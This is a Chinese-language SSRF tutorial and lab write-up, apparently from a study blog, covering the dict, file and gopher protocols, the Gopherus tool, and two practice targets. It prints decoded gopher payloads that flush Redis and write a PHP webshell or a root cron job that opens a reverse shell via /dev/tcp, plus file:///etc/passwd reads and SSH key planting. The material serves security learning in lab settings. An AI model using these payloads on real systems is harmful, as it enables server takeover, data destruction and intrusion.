SSRF - 服务器端请求伪造

目录

SSRF

dict协议

file协议

gopher协议

工具Gopherus

练习

练习1

练习2

docker镜像加速的方法

---

SSRF

SSRF(Server-Side Request Forgery:服务器端请求伪造)

其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制，导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。

• 数据流:攻击者----->服务器---->目标地址

curl支持很多协议，有FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE以及LDAP

dict协议

dict 协议是一个在线网络字典协议，这个协议是用来架设一个字典服务的。我们可以通过dict 探测内网端口号，根据回显内容判断内容端口，主要可以用来探测一下端口信息。

可以探测端口来判断是否存在漏洞

• fastcgi存在可以实现RCE。

  • 在存在ssrf漏洞情况下，此时可以利用程序去访问本地内网。对自己本身不限制，也许可以实现RCE。

• redis的端口6379，可以实现未授权访问

  • 低版本上可能部分没有设置密码，并且安全模式关闭。

    • 写入webshell--知道物理路径
    • 写入任务计划--反弹shell，权限不一定高。
    • 写入公钥，直接登录服务器。基本上是最高权限

file协议

file读取文件，前提是需要知道物理路径信息 + 权限足够查看内容。比如我们可以读取问passwd文件的内容如下

 url=flie://etc/passwd

php原本不允许在前端查看，所以解析之后查看不到，可以查看源码。可以查看其它文件，一般都可以查看到。这个就是服务器的连接文件的内容。

gopher协议

• gopher协议是一种信息查找系统，他将Internet上的文件组织成某种索引，方便用户从Internet的一处带到另一处。在WWW出现之前，Gopher是Internet上最主要的信息检索工具，Gopher站点也是最主要的站点，使用tcp70端口。但在WWW出现后，Gopher失去了昔日的辉煌。现在它基本过时，人们很少再使用它。

• 它只支持文本，不支持图像。

工具Gopherus

如果你知道哪里是SSRF易受攻击的地方，那么这个工具将帮助你生成Gopher有效载荷来利用SSRF(服务器端请求伪造)并获得RCE(远程代码执行)。它还可以帮助你在受害服务器上获得反向shell。

• MySQL (Port-3306)

• PostgreSQL(Port-5432)

• FastCGI (Port-9000)

• Memcached (Port-11211)

  • 如果存储的数据被反序列化

    • Python

    • Ruby

    • PHP

• Redis (Port-6379)

• Zabbix (Port-10050)

• SMTP (Port-25)

通过命令gopherus --exploit redis进行启动，启动后可以选择写入反弹shell(写入任务计划)还是phpshell（写入到根路径下的文件）。

如果选择写入phpshell，软件会要求网站的物理路径信息。如果网站的debug没关的情况下可以通过报错将网站的物理路径信息获得。之后需要写入的phpshell或者不写使用默认的webshell。软件根据选的内容自动生成攻击指令。我们通过解码查看内容是什么。

 gopher://127.0.0.1:6379/_*1 --- 字段为1
 $8
 flushall --- 字段长度为8个，目的是清空整个Redis服务器的数据。避免对写入的webshell有影响。
 ​
 ​
 *3 --- 三个字段，用来在Redis数据库中写入键值1:<?php phpinfo(); ?>
 $3  
 set
 $1
 1
 $25
 ​
 <?php phpinfo(); ?>
 ​
 *4 --- 四个字段，通过config命令对数据进行落盘，并指定落盘路径信息。
 $6
 config
 $3
 set
 $3
 dir
 $13
 /var/www/html
 *4
 $6
 config
 $3
 set
 $10
 dbfilename
 $9
 shell.php
 *1
 $4
 save
 %0

如果选择写入反弹shell，我们需要先给定一个反弹shell的地址。需要选择写入任务计划的路径。我们通过解码查看内容是什么。（在CentOS系统下大概率成功，Ubuntu系统下可能不成功）

 gopher://127.0.0.1:6379/_*1
 $8 --- 字段长度为8个，
 flushall --- 目的是清空整个Redis服务器的数据。避免对写入的webshell有影响。
 *3
 $3
 set
 $1
 1
 $69
 ​
 ​
 */1 * * * * bash -c "sh -i >& /dev/tcp/192.168.47.132/1234 0>&1" --- 反弹到1234端口
 ​
 ​
 ​
 *4
 $6
 config
 $3
 set
 $3
 dir
 $16
 /var/spool/cron/   ----- 任务计划目录
 *4
 $6
 config
 $3
 set
 $10
 dbfilename
 $4
 root   ---- 写入到root文件中，所以反弹后是以root权限执行shell，反弹回去的权限也是root权限。
 *1
 $4
 save

至于通过写公钥的方式，我们需要通过ssh-keygen来生成公私钥。我们想要入侵服务器中可以将我们的公钥存入到服务器的~/.ssh/authorized_keys文件夹下，即可匹配你的私钥进行登录。可以通过redis将数据存储到服务器的任意位置，所以我们可以将公钥写入到~/.ssh/authorized_keys文件夹下。

练习

练习1

靶场是pikachu，可以通过docker进行拉取环境。

 docker run -d -p 8765:80 8023/pikachu-expect:latest

选择第一个ssrf环境的代码分析

因为没有进行URL过滤，直接通过curl_exec函数进行请求。由于没有限制，本来是访问本地资源，但是通过curl_exec函数可以访问任意的网站资源。

curl_exec

• 解释

  • (PHP 4 >= 4.0.2, PHP 5, PHP 7, PHP 8)

  • curl_exec --- 执行指定 cURL 会话。这个函数应该在初始化 cURL 会话并且设置所有选项后调用。

• 基本语法

   curl_exec(CurlHandle $handle): string|bool
   ​
   handle  ---- 由 curl_init() 返回的 cURL 句柄。

• 返回值

  • 成功时返回 true， 或者在失败时返回 false。 然而，如果设置了 CURLOPT_RETURNTRANSFER 选项，将会在成功时返回结果，失败时返回 false。

练习2

 镜像源的拉取：docker pull ctftraining/delta_2019_web_ssrfme
 ​
 启动
 docker-compose up -d
 open http://127.0.0.1:8302/

分析代码，发现限制了dict协议，这样我们就不能探测内网端口，并且还不让读取内网数据。

我们通过尝试通过file:///etc/passwd看看这个伪协议是否能读取文件内容。

发现不能读取文件内容。通过查看代码，我们发现如果info只要存在值就可以打印出phpinfo的信息页面。一般phpinfo页面中可能会存在一些有用的信息。

我们发现此时的id是172.21.0.3，这个IP地址很有可能是一个内网地址。

我们首先通过尝试url=http://172.21.0.3:80发现页面重新打印了一边代码。所以此时我们可以通过修改端口号进行查看连接情况。所以通过抓包爆破端口号1-10000。探测太多端口没什么用，只有部分端口对我们才有用。

不同的情况下的长度是不同的。我们发现只开放的一个80端口。所以我们就不再这台服务器上浪费时间。可以尝试猜IP地址判断是否存在其他的服务器。

其他服务器的地址可能为172.21.0.1或者172.21.0.2等很多个IP地址，我们可以通过修改url=http://172.21.0.1:80判断页面回显信息判断是否存服务器。

分别查看url=http://172.21.0.1:80内容

以及url=http://172.21.0.2:80

但是url=http://172.21.0.4:80并没有内容，初步判断可能不存在。我们先使用172.21.0.2来进行端口爆破，检测端口开放情况。因为172.21.0.1是个初始化的apache初始化页面，是个html文件，而172.21.0.2看起来更像是一个php文件。

我们发现开放了6379端口，所以我们需要在目录下传递webshell，但是我们现在并不知道网站路径到底是多少。所以只能去猜，猜他在默认路径下。

我们通过Gopherus工具打一下这个网站。随便写一个PHP代码测试<?php system("id"); ?>，也可以修改一下数据落盘的位置，选择一些upload等地方权限可能相对放轻，容易成功。

传入我们生成的代码位置，加载完成之后去访问写入的shell.php文件。

没有生成shell.php文件，可能是权限不足或者二次编码，但是二次编码依然不行。可以判断是否有其他文件目录的权限比较小。可以实现我们的代码写入shell.php文件，所以我们可以找寻字典进行爆破扫描，通过查看长度来判断是否有其他目录。我们发现upload长度不一样，所以我们需要修改Gopherus工具生成代码落盘的代码数据存储位置。

但是我们发现依然不行，是不是需要考虑二次编码的问题呢？

通过二次编码此时加载的比较久，我们可以中断去访问shell.php文件。发现好像是成功写入文件。

此时我们可以重新生成代码，尝试读取一下flag。

成功读取flag文件

docker镜像加速的方法

第一个是在/etc/docker下的daemon.json，使用阿里云提供的镜像加速器进行下载

 {
     "registry-mirrors":["https://gi6dbio3.mirror.aliyuncs.com"]
 }

方法二

通过科学上网进行加速拉取，选则物理机的IP地址，并且加上代理器提供的端口(比较推荐)

具体搭建细节可以参考这篇博客https://www.cnblogs.com/Chary/p/18096678